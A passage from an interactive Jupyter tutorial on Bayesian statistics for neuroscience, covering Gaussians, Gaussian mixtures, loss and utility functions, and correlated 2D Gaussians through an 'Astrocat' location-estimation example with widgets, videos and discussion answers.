sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_prior", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_g = fixed(1.0),
mu_c = fixed(-1.0),
sigma_g = fixed(0.5),
sigma_c = fixed(value=0.5),
plot_utility_row=fixed(False))
elif what_to_plot == "Uniform":
widget = interact(plot_utility_uniform,
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_g = fixed(1.0),
mu_c = fixed(-1.0),
sigma_g = fixed(0.5),
sigma_c = fixed(value=0.5),
plot_utility_row=fixed(False))
elif what_to_plot == "Gamma":
widget = interact(plot_utility_gamma,
alpha = FloatSlider(min=1.0, max=10.0, step=0.1, value=2.0, description="α_prior", continuous_update=False),
beta = FloatSlider(min=0.5, max=2.0, step=0.01, value=1.0, description="β_prior", continuous_update=False),
offset = FloatSlider(min=-6.0, max=2.0, step=0.1, value=0.0, description="offset", continuous_update=False),
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_g = fixed(1.0),
mu_c = fixed(-1.0),
sigma_g = fixed(0.5),
sigma_c = fixed(value=0.5),
plot_utility_row=fixed(False))
elif what_to_plot == "Mixture of Gaussians":
widget = interact(plot_utility_mixture,
mu_m1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_mix_1", continuous_update=False),
mu_m2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_mix_1", continuous_update=False),
sigma_m1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_mix_1", continuous_update=False),
sigma_m2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_mix_2", continuous_update=False),
factor = FloatSlider(min=0.0, max=1.0, step=0.01, value=0.5, description="π", continuous_update=False),
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_g = fixed(1.0),
mu_c = fixed(-1.0),
sigma_g = fixed(0.5),
sigma_c = fixed(value=0.5),
plot_utility_row=fixed(False))
def plot_bayes_loss_utility_switcher(what_to_plot):
if what_to_plot == "Gaussian":
widget = interact(plot_bayes_loss_utility_gaussian,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_prior", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_prior", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_true = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_true", continuous_update=False),
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "))
elif what_to_plot == "Uniform":
widget = interact(plot_bayes_loss_utility_uniform,
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_true = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_true", continuous_update=False),
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "))
elif what_to_plot == "Gamma":
widget = interact(plot_bayes_loss_utility_gamma,
alpha = FloatSlider(min=1.0, max=10.0, step=0.1, value=2.0, description="α_prior", continuous_update=False),
beta = FloatSlider(min=0.5, max=2.0, step=0.01, value=1.0, description="β_prior", continuous_update=False),
offset = FloatSlider(min=-6.0, max=2.0, step=0.1, value=0.0, description="offset", continuous_update=False),
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_true = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_true", continuous_update=False),
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "))
elif what_to_plot == "Mixture of Gaussians":
widget = interact(plot_bayes_loss_utility_mixture,
mu_m1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_mix_1", continuous_update=False),
mu_m2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_mix_1", continuous_update=False),
sigma_m1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_mix_1", continuous_update=False),
sigma_m2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_mix_2", continuous_update=False),
factor = FloatSlider(min=0.0, max=1.0, step=0.01, value=0.5, description="π", continuous_update=False),
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_true = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_true", continuous_update=False),
loss_f = widgets.Dropdown(
options=["Mean Squared Error", "Absolute Error", "Zero-One Loss"],
value="Mean Squared Error", description="Loss: "))
# + cellView="form"
# @title Helper functions
def gaussian(x, μ, σ):
return np.exp(-((x - μ) / σ)**2 / 2) / np.sqrt(2 * np.pi * σ**2)
def gamma_pdf(x, α, β):
return gamma_distribution.pdf(x, a=α, scale=1/β)
def mvn2d(x, y, mu1, mu2, sigma1, sigma2, cov12):
mvn = multivariate_normal([mu1, mu2], [[sigma1**2, cov12], [cov12, sigma2**2]])
return mvn.pdf(np.dstack((x, y)))
def product_guassian(mu1, mu2, sigma1, sigma2):
J_1, J_2 = 1/sigma1**2, 1/sigma2**2
J_3 = J_1 + J_2
mu_prod = (J_1*mu1/J_3) + (J_2*mu2/J_3)
sigma_prod = np.sqrt(1/J_3)
return mu_prod, sigma_prod
def reverse_product(mu3, sigma3, mu1, mu2):
J_3 = 1/sigma3**2
J_1 = J_3 * (mu3 - mu2) / (mu1 - mu2)
J_2 = J_3 * (mu3 - mu1) / (mu2 - mu1)
sigma1, sigma2 = 1/np.sqrt(J_1), 1/np.sqrt(J_2)
return sigma1, sigma2
def calc_mean_mode_median(x, y):
"""
"""
pdf = y * (x[1] - x[0])
# Calc mode of an arbitrary function
mode = x[np.argmax(pdf)]
# Calc mean of an arbitrary function
mean = np.multiply(x, pdf).sum()
# Calc median of an arbitrary function
cdf = np.cumsum(pdf)
idx = np.argmin(np.abs(cdf - 0.5))
median = x[idx]
return mean, median, mode
def calc_expected_loss(loss_f, posterior, x):
dx = x[1] - x[0]
expected_loss = np.zeros_like(x)
for i in np.arange(x.shape[0]):
loss = calc_loss_func(loss_f, x[i], x) # or mse or zero_one_loss
expected_loss[i] = np.sum(loss * posterior) * dx
return expected_loss
def plot_mixture_prior(x, gaussian1, gaussian2, combined):
"""
DO NOT EDIT THIS FUNCTION !!!
Plots a prior made of a mixture of gaussians
Args:
x (numpy array of floats): points at which the likelihood has been evaluated
gaussian1 (numpy array of floats): normalized probabilities for Gaussian 1 evaluated at each `x`
gaussian2 (numpy array of floats): normalized probabilities for Gaussian 2 evaluated at each `x`
posterior (numpy array of floats): normalized probabilities for the posterior evaluated at each `x`
Returns:
Nothing
"""
fig, ax = plt.subplots()
ax.plot(x, gaussian1, '--b', LineWidth=2, label='Gaussian 1')
ax.plot(x, gaussian2, '-.b', LineWidth=2, label='Gaussian 2')
ax.plot(x, combined, '-r', LineWidth=2, label='Gaussian Mixture')
ax.legend()
ax.set_ylabel('Probability')
ax.set_xlabel('Orientation (Degrees)')
def gaussian_mixture(mu1, mu2, sigma1, sigma2, factor):
assert 0.0 < factor < 1.0
x = np.linspace(-7.0, 7.0, 1000, endpoint=True)
y_1 = gaussian(x, mu1, sigma1)
y_2 = gaussian(x, mu2, sigma2)
mixture = y_1 * factor + y_2 * (1.0 - factor)
plt.figure(figsize=(8, 6))
plt.plot(x, y_1, c='deepskyblue', label='p(x)', linewidth=3.0)
plt.fill_between(x, y_1, color='deepskyblue', alpha=0.2)
plt.plot(x, y_2, c='aquamarine', label='p(y)', linewidth=3.0)
plt.fill_between(x, y_2, color='aquamarine', alpha=0.2)
plt.plot(x, mixture, c='b', label='$\pi \cdot p(x) + (1-\pi) \cdot p(y)$', linewidth=3.0)
plt.fill_between(x, mixture, color='b', alpha=0.2)
plt.yticks([])
plt.legend(loc="upper left")
# plt.ylabel('$f(x)$')
plt.xlabel('x')
plt.show()
# -
# ---
# # Section 1: Astrocat!
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="d09647fd-afdc-4f94-a727-042502ce12ee"
# @title Video 1: Astrocat!
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='D7Z-aTX92Pk', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# -
# Remember, in this example, you can think of yourself as a scientist trying to decide where we belive Astrocat is, how to select a point estimate (single guess of location) based on possible errors, and how to account for the uncertainty we have about the location of the satellite and the space mouse. In fact, this is the kind of problem real scientists working to control remote satellites face! However, we can also think of this as what your brain has does when it wants to determine a target to make a movement or hit a tennis ball! A number of classic experiments use this kind of framing to study how *optimal* human decisions or movements are! Some examples are in the further reading document.
# ---
# # Section 2: Probability distribution of Astrocat location
#
#
# We are going to think first about how Ground Control should estimate his position. We won't consider measurements yet, just how to represent the uncertainty we might have in general. We are now dealing with a continuous distribution - Astrocat's location can be any real number. In the last tutorial, we were dealing with a discrete distribution - the fish were either on one side or the other.
#
# So how do we represent the probability of each possible point (an infinite number) where the Astrocat could be?
# The Bayesian approach can be used on any probability distribution. While many variables in the world require representation using complex or unknown (e.g. empirical) distributions, we will be using the Gaussian distributions or extensions of it.
# ## Section 2.1: The Gaussian distribution
#
# One distribution we will use throughout this tutorial is the **Gaussian distribution**, which is also sometimes called the normal distribution.
#
# This is a special, and commonly used, distribution for a couple reasons. It is actually the focus of one of the most important theorems in statistics: the Central Limit Theorem. This theorem tells us that if you sum a large number of samples of a variable, that sum is normally distributed *no matter what* the original distribution over a variable was. This is a bit too in-depth for us to get into now but check out links in the Bonus for more information. Additionally, Gaussians have some really nice mathematical properties that permit simple closed-form solutions to several important problems. As we will see later in this tutorial, we can extend Gaussians to be even more flexible and well approximate other distributions using mixtures of Gaussians. In short, the Gaussian is probably the most important continous distribution to understand and use.
#
#
# Gaussians have two parameters. The **mean** $\mu$, which sets the location of its center. Its "scale" or spread is controlled by its **standard deviation** $\sigma$ or its square, the **variance** $\sigma^2$. These can be a bit easy to mix up: make sure you are careful about whether you are referring to/using standard deviation or variance.
#
# The equation for a Gaussian distribution on a variable $x$ is:
#
# $$
# \mathcal{N}(\mu,\sigma^2) = \frac{1}{\sqrt{2\pi\sigma^2}}\exp\left(\frac{-(x-\mu)^2}{2\sigma^2}\right)
# $$
#
# In our example, $x$ is the location of the Astrocat in one direction. $\mathcal{N}(\mu,\sigma^2)$ is a standard notation to refer to a **N**ormal (Gaussian) distribution. For example, $\mathcal{N}(0, 1)$ denotes a Gaussian distribution with mean 0 and variance 1. The exact form of this equation is not particularly intuitive, but we will see how mean and standard deviation values affect the probability distribution.
#
#
# We won't implement a Gaussian distribution in code here but please refer to the pre-reqs refresher W0D5 T1 to do this if you need further clarification.
#
# + cellView="form"
# @markdown Execute this cell to enable the function `gaussian`
def gaussian(x, μ, σ):
return np.exp(-((x - μ) / σ)**2 / 2) / np.sqrt(2 * np.pi * σ**2)
# -
# ### Interactive Demo 2.1: Exploring Gaussian parameters:
#
# Let's explore how the parameters of a Gaussian affect the distribution. Play with the demo below by changing the mean $\mu$ and standard deviation $\sigma$.
#
# Discuss the following:
#
# 1. What does increasing $\mu$ do? What does increasing $\sigma$ do?
# 2. If you wanted to know the probability of an event happing at $0$, can you find two different $\mu$ and $\sigma$ values that produce the same probabilty of an event at $0$?
# 3. How many Gaussian's could produce the same probabilty at $0$?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_gaussian,
μ = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.0, continuous_update=False),
σ = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, continuous_update=False))
# +
# to_remove explanation
#. 1. Increasing u moves the distribution to the right along the x-axis. The center
#. of the distribution equals u - which makes sense as this is the mean! Increasing
#. the standard deviation makes the distribution wider.
#. 2. Yes, you can! For example, keep the standard deviation the same and move the mean
#. from -2 to 2. At both of these, the probability at 0 is the same because the distribution
#. is symmetrical.
#. 3. There are an infinite number of Gaussians (combinations of mean & standard deviation)
#. that could produce the same probability at 0
# -
# ## Section 2.2: Multiplying Gaussians
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="bdb6b0e4-b0fa-4603-ef5c-cf0e0a3b6834"
# @title Video 2: Multiplying Gaussians
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='areR25_0FyY', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# -
# When we multiply Gaussians, we are not multiplying random variables but the actual underlying distributions. If we multiply two Gaussian distributions, with means $\mu_1$ and $\mu_2$ and standard deviations $\sigma_1$ and $\sigma_2$, we get another Gaussian. The Gaussian resulting from the multiplication will have mean $\mu_3$ and standard deviation $\sigma_3$ where:
#
# $$
# \mu_{3} = a\mu_{1} + (1-a)\mu_{2}
# $$
# $$
# \sigma_{3}^{-2} = \sigma_{1}^{-2} + \sigma_{2}^{-2}\\
# a = \frac{\sigma_{1}^{-2}}{\sigma_{1}^{-2} + \sigma_{2}^{-2}}
# $$
#
# This may look confusing but keep in mind that the information in a Gaussian is the inverse of its variance: $\frac{1}{\sigma^2}$. Basically, when multiplying Gaussians, the mean of the resulting Gaussian is a weighted average of the original means, where the weights are proportional to the amount of information of that Gaussian. The information in the resulting Gaussian is equal to the sum of informations of the original two. We'll dive into this in the next demo.
# ### Interactive Demo 2.2: Multiplying Gaussians
#
# We have implemented the multiplication of two Gaussians for you. Using the following widget, we are going to think about the information and combination of two Gaussians. It In our case, imagine we want to find the middle location between the satellite and the space mouse. This would be the center (average) of the two locations. Because we have uncertainty, we need to weight our uncertainty in thinking about the most likely place.
#
# In this demo, $\mu_{1}$ and $\sigma_{1}$ are the mean and standard deviation of the distribution over satellite location, $\mu_{2}$ and $\sigma_{2}$ are the mean and standard deviation of the distribution over space mouse location, and $\mu_{3}$ and $\sigma_{3}$ are the mean and standard deviation of the distribution over the center location (gained by multiplying the first two).
#
# Questions:
#
# 1. What is your uncertainty (how much information) do you have about $\mu_{3}$ with $\mu_{1} = -2, \mu_{2} = 2, \sigma_{1} = \sigma_{2} = 0.5$?
# 2. What happens to your estimate of $\mu_{3}$ as $\sigma_{2} \to \infty$? (In this case, $\sigma$ only goes to 11... but that should be loud enough.)
# 3. What is the difference in your estimate of $\mu_{3}$ if $\sigma_{1} = \sigma_{2} = 11$? What has changed from the first example?
# 4. Set $\mu_{1} = -4, \mu_{2} = 4$ and change the $\sigma$s so that $\mu_{3}$ is close to $2$. How many $\sigma$s will produce the same $\mu_{3}$?
# 5. Continuing, if you set $\mu_{1} = 0$, what $\sigma$ do you need to change so $\mu_{3} ~= 2$?
# 6. If $\sigma_{1} = \sigma_{2} = 0.1$, how much information do you have about the average?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_information,
mu1 = FloatSlider(min=-5.0, max=-0.51, step=0.01, value=-2.0, description="µ_1",continuous_update=False),
mu2 = FloatSlider(min=0.5, max=5.01, step=0.01, value=2.0, description="µ_2",continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=11.01, step=0.01, value=1.0, description="σ_1", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=11.01, step=0.01, value=1.0, description="σ_2", continuous_update=False)
)
# +
# to_remove explanation
#. 1) Information is ~ 1/variance, so the new information you have is roughly 1/(0.5^2 + 0.5^2)
#. (compared to 1/0.5^2) for each original measurement.
#. 2) The estimate will be almost entirely dependent on the mu_{1}! There is almost no
#. information from mu_{2}.
#. 3) Because the variances are the same, the amount of information you have about the center
#. is lower (very low in fact), but the mean doesn't change!
#. 4) There are an infinite number of variances that will produce the same (relative) weighting.
#. The only thing that matters is the relative means and relative variances!
#. 5) This is the same intuition, it's the relative weightings that matter, so you can only
#. think about the result (in this case the variance of the second Gaussian) relative to
#. the first.
#. 6) As the variances -> zero, the amount of information goes to infinity!
# -
# To start thinking about how we might use these concepts directly in systems neuroscience, imagine you want to know how much information is gained combining (averaging) the response of two neurons that represent locations in sensory space (think: how much information is shared by their receptive fields). You would be multiplying Gaussians!
# ## Section 2.3: Mixtures of Gaussians
#
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="03026396-5fe8-408a-8998-8ecfbb5f4e89"
# @title Video 3: Mixtures of Gaussians
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='5zoRO10urSk', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# -
#
# What if our continuous distribution isn't well described by a single bump? For example, what if the Astrocat is often either in one place or another - a Gaussian distribution would not capture this well! We need a multimodal distribution. Luckily, we can extend Gaussians into a *mixture of Gaussians*, which are more complex distributions.
#
# In a Gaussian mixture distribution, you are essentially adding two or more weighted standard Gaussian distributions (and then normalizing so everything integrates to 1). Each standard Gaussian involved is described, as normal, by its mean and standard deviation. Additional parameters in a mixture of Gaussians are the weights you put on each Gaussian (π). The following demo should help clarify how a mixture of Gaussians relates to the standard Gaussian components. We will not cover the derivation here but you can work it out as a bonus exercise.
#
# Mixture distributions are a common tool in Bayesian modeling and an important tool in general.
#
#
# ### Interactive Demo 2.3: Exploring Gaussian mixtures
#
# We will examing a mixture of two Gaussians. We will have one weighting parameter, π, that tells us how to weight one of the Gaussians. The other is weighted by 1 - π.
#
# Use the following widget to experiment with the parameters of each Gaussian and the mixing weight ($\pi$) to undersand how the mixture of Gaussian distribution behaves.
#
# Discuss the following questions:
#
# 1. What does increasing the weight $\pi$ do to the mixture distribution (dark blue)?
# 2. How can you make the two bumps of the mixture distribution further apart?
# 3. Can you make the mixture distribution have just one bump (like a Gaussian)?
# 4. Any other shapes you can make the mixture distribution resemble other than one nicely rounded bump or two separate bumps?
#
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(gaussian_mixture,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=1.0, description="µ_1", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-1.0, description="µ_2", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_1", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_2", continuous_update=False),
factor = FloatSlider(min=0.1, max=0.9, step=0.01, value=0.5, description="π", continuous_update=False))
# +
# to_remove explanation
#. 1) Increasing the weight parameter makes the mixture distribution more closely
#. resemble p(x). This makes sense because it is weighting p(x) in the sum of Gaussians.
#. 2) You can move the two bumps of the mixture model further apart by making the means
#. u_1 and u_2 of the two Gaussians more different (having one at -4 and one at 4 for
#. example)
#. 3) If you make the means of the two Gaussians very similar, the mixture will resemble
#. a single Gaussian (u_1 = 0.25, u_2 = 0.3 for example)
#. 4) You can make a bunch of shapes if the two Gaussian components overlap at all.
#. If they're completely separated, you'll just get two Gaussian looking bumps
#.
# -
# ---
# # Section 3: Utility
#
#
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="9181fbbb-fb37-4803-ad74-c9b3538da07d"
# @title Video 4: Utility
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='I5H7Anh3FXs', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# -
# We want to know where Astrocat is. If we were asked to provide the coordinates, for example to display them for Ground Control or to note them in a log, we are not going to provide the whole probability distribution! We will give a single set of coordinates, but we first need to estimate those coordinates. Just like in the last tutorial, this may not be as easy as just what is most likely: we want to know how good or bad it is if we guess a certain location and the Astrocat is in another.
#
#
# As we have seen, utility represents the gain (or if negative, loss) for us if we take a certain action for a certain value of the hidden state. In our continuous example, we need a function to be able to define the utility with respect to all possible continuous values of the state. Our action here is our guess of the Astrocat location.
#
# We are going to explore this for the Gaussian distribution, where our estimate is $\hat{\mu}$ and the true hidden state we are interested in is $\mu$.
#
# A loss function determines the "cost" (or penalty) of estimating $\hat \mu$ when the true or correct quantity is really $\mu$ (this is essentially the cost of the error between the true hidden state we are interested in: $\mu$ and our estimate: $\hat \mu$). A loss function is equivalent to a negative utility function.
#
# ## Section 3.1: Standard loss functions
#
# There are lots of different possible loss functions. We will focus on three: **mean-squared error** where the loss is the different between truth and estimate squared, **absolute error** where the loss is the absolute difference between truth and estimate, and **Zero-one Loss** where the loss is 1 unless we're exactly right (the estimate equals the truth). We can represent these with the following formulas:
#
# $$
# \begin{eqnarray}
# \textrm{Mean Squared Error} &=& (\mu - \hat{\mu})^2 \\
# \textrm{Absolute Error} &=& \big|\mu - \hat{\mu}\big| \\
# \textrm{Zero-One Loss} &=& \begin{cases}
# 0,& \textrm{if } \mu = \hat{\mu} \\
# 1, & \textrm{otherwise}
# \end{cases}
# \end{eqnarray}
# $$
#
# We will now explore how these different loss functions change our expected utility!
#
# Check out the next cell to see the implementation of each loss in the function `calc_loss_func`.
#
# + cellView="form"
# @markdown Execute this cell to enable the function `calc_loss_func`
def calc_loss_func(loss_f, mu_true, x):
error = x - mu_true
if loss_f == "Mean Squared Error":
loss = (error)**2
elif loss_f == "Absolute Error":
loss = np.abs(error)
elif loss_f == "Zero-One Loss":
loss = (np.abs(error) >= 0.03).astype(np.float)
return loss
# -
# ### Interactive demo 3: Exploring Loss with different distributions
#
# Let's see how our loss functions interact with probability distributions to affect expected utility and consequently, the action we take.
#
# Play with the widget below and discuss the following:
#
# 1. With a Gaussian distribution, does the peak of the expected utility ever change position on the x-axis for the three different losses? This peak denotes the action we would choose (the location we would guess) so in other words, would the different choices of loss function affect our action?
# 2. With a mixture of Gaussian distribution with two bumps, does the peak of the expected loss ever change position on the x-axis for the three different losses?
# 3. Find parameters for a mixture of Gaussians that results in the mean, mode, and median all being distinct (not equal to one another). With this distribution, how does the peak of the expected utility correspond to the mean/median/mode of the probability distribution for each of the three losses?
# 4. When the mixture of Gaussians has two peaks that are exactly the same height, how many modes are there?
#
#
#
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(loss_plot_switcher,
what_to_plot = widgets.Dropdown(
options=["Gaussian", "Mixture of Gaussians"],
value="Gaussian", description="Distribution: "))
# +
# to_remove explanation
#. 1) No, no matter what parameters we choose for the Gaussian, the peak of the expected
#. utility is the same. In other words, we would choose the same action (provide the same
#. location estimate) for all 3 estimates.
#. 2) Yes, the peak of expected utility is in different locations for each loss when using
#. a mixture of Gaussians distribution.
#. 3) When using mean-squared error, the peak is at the location of the mean. For
#. absolute error, the peak is located at the median. And for zero-one loss, the
#. peaks are at the two mode values.
#. 4) When a distribution has more than one maximum, it is multi-modal! This means
#. it can have more than one mode. You will only ever have one mean and one median.
# -
# You can see that what coordinates you would provide for Astrocat aren't necessarily easy to guess just from the probability distribution. You need the concept of utility/loss and a specific loss function to determine what estimate you should give.
#
# For symetric distributions, you will find that the mean, median and mode are the same. However, for distributions with *skew*, like the Gamma distribution or the Exponential distribution, these will be different. You will be able to explore more distributions as priors below.
# ## Section 3.2: A more complex loss function
#
# The loss functions we just explored were fairly simple and are often used. However, life can be complicated and in this case, Astrocat cares about both being near the space mouse and avoiding the satellite. This means we need a more complex loss function that captures this!
#
# We know that we want to estimate Astrocat to be closer to the mouse, which is safe and desirable, but further away from the satellite, which is dangerous! So, rather than thinking about the *Loss* function, we will consider a generalized utility function that considers gains and losses that *matter* to Astrocat!
#
# In this case, we can assume that depending on our uncertainty about Astrocat's probable location, we may want to 'guess' that Astrocat is close to 'good' parts of space and further from 'bad' parts of space. We will model these utilities as Gaussian gain and loss regions--and we can assume the width of the Gaussian comes from our uncertainty over where the Space Mouse and satellite are.
#
# Let's explore how this works in the next interactive demo.
#
# ### Interactive demo 3.2: Complicated cat costs
#
# Now that we have explored *Loss* functions that can be used to determine both formal *estimators* and our expected loss given our error, we are going to see what happens to our estimates if we use a generalized utility function.
#
# Questions:
#
# 1. As you change the $\mu$ of Astrocat, what happens to the expected utility?
# 2. Can the EU be exactly zero everywhere?
# 3. Can the EU be zero in a region around Astrocat but positive and negative elsewhere?
# 4. As our uncertainty about Astrocat's position increases, what happens to the expected utility?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_simple_utility_gaussian,
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ", continuous_update=False),
mu_g = FloatSlider(min=-4.0, max=4.0, step=0.01, value=1.0, description="µ_gain", continuous_update=False),
mu_c = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-1.0, description="µ_cost", continuous_update=False),
sigma_g = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_gain", continuous_update=False),
sigma_c = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_cost", continuous_update=False))
# +
# to_remove explanation
#. 1) As Astrocat's mean get closer to the mean of the gain (or loss), the EU become dominated
#. by only the gain or loss.
#. 2) Only if the mean and variances of both the gain and loss regions are exactly the same.
# . (Set one of the variances 0.01 more than the other to see this.)
#. 3) If the variances of the gain and loss function are small enough relative to the position
#. of Astrocat, there will be a 'neutral' region. As the variances increase, this will go away.
#. 4) As the uncertainty of Astrocat's location increases (relative to the gain and loss variances).
#. there will be a continuous increase in utility from the peak of the loss region to the peak of the
#. gain region. Also, this will depend on the mean of Astrocat's distribution! The larger the variance
#. the more sensitive the expected utility is to both the gains and losses!
# -
# ---
# # Section 4: Correlation and marginalization
#
# In this section we will explore a two dimensional Gaussian, often defined as a two-dimension vector of Gaussian random variables. This is, in essence, the joint distribution of two Gaussian random variables.
#
#
# ## Video 5: Correlation and marginalization
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="530d9b73-7525-4466-a271-be46355f166a"
# @title Video 5: Correlation and marginalization
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='NSDd0kvQtcY', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# -
# ## Section 4.1: Correlation
#
# If the two variables in a two dimensional Gaussian are independent, looking at one tells us nothing about the other. But what if the the two variables are correlated (covary)?
#
# The covariance of two Gaussians with means $\mu_X$ and $\mu_Y$ and standard deviations $\sigma_X$ and $\sigma_Y$is:
#
# $$
# \sigma_{XY} = E[(X-\mu_{X})(Y-\mu_{Y})]
# $$
#
# $E$ here denotes the expected value. So the covariance is the expected value of the random variable X minus the mean of the Gaussian distribution on X times the random variable Y minus the mean of the Gaussian distribution on Y.
#
# The correlation is the covariance normalized, so that it goes between -1 (exactly anticorrelated) to 1 (exactly correlated).
#
# $$
# \rho_{XY} = \frac{\sigma_{XY}}{\sigma_{X}\sigma_{Y}}
# $$
#
# These are key concepts and while we are considering two hidden states (or two random variables), they extend to $N$ dimensional vectors of Gaussian random variables. You will find these used all over computational neuroscience.
#
#
# ### Interactive demo 4.1: Covarying 2D Gaussian
#
# Let's explore this 2D Gaussian (i.e. joint distribution of two Gaussians).
#
# Use the following widget to think about the following questions:
#
# 1. If these variables represent hidden states we care about, what does observing one tell us about the other? How does this depend on the correlation?
# 2. How does the shape of the distribution change when we change the means? The variances? The correlation?
# 3. If we want to isolate one or the other hidden state distributions, what do we need to do? (Hint: think about Tutorial 1.)
# + cellView="form"
# @markdown Execute the cell to enable the widget
widget = interact(plot_mvn2d,
mu1 = FloatSlider(min=-1.0, max=1.0, step=0.01, value=0.0, description="µ_1", continuous_update=False),
mu2 = FloatSlider(min=-1.0, max=1.0, step=0.01, value=0.0, description="µ_2", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=1.5, step=0.01, value=0.5, description="σ_1", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=1.5, step=0.01, value=0.5, description="σ_2", continuous_update=False),
corr = FloatSlider(min=-0.99, max=0.99, step=0.01, value=0.0, description="ρ", continuous_update=False))
# +
# to_remove explanation
#. 1) The higher the correlation, the more shared information there is. So, the probabilities of the
#. second hidden state are more dependent on the first (and vice versa).
#. 2) The means control only the location! The variances determine the spread in X and Y. The
#. correlation is the only factor that controls the degree of the 'rotation', where we can think
#. about the correlation as forcing the distribution to be more along one of the diagonals or ther
#. other.
#. 3) We would need to marginalize! We will do this next.
# -
# ## Section 4.2: Marginalization and information
#
# We learned in Tutorial 1 that if we want to measure the probability of one or another variable, we need to average over the other. When we extend this to the correlated Gaussians we just played with, marginalization works the same way. Let's say that the two variables reflect Astrocat's position in space (in two dimensions). If we want to get our uncertainty about Astrocat's X or Y position, we need to marginalize.
#
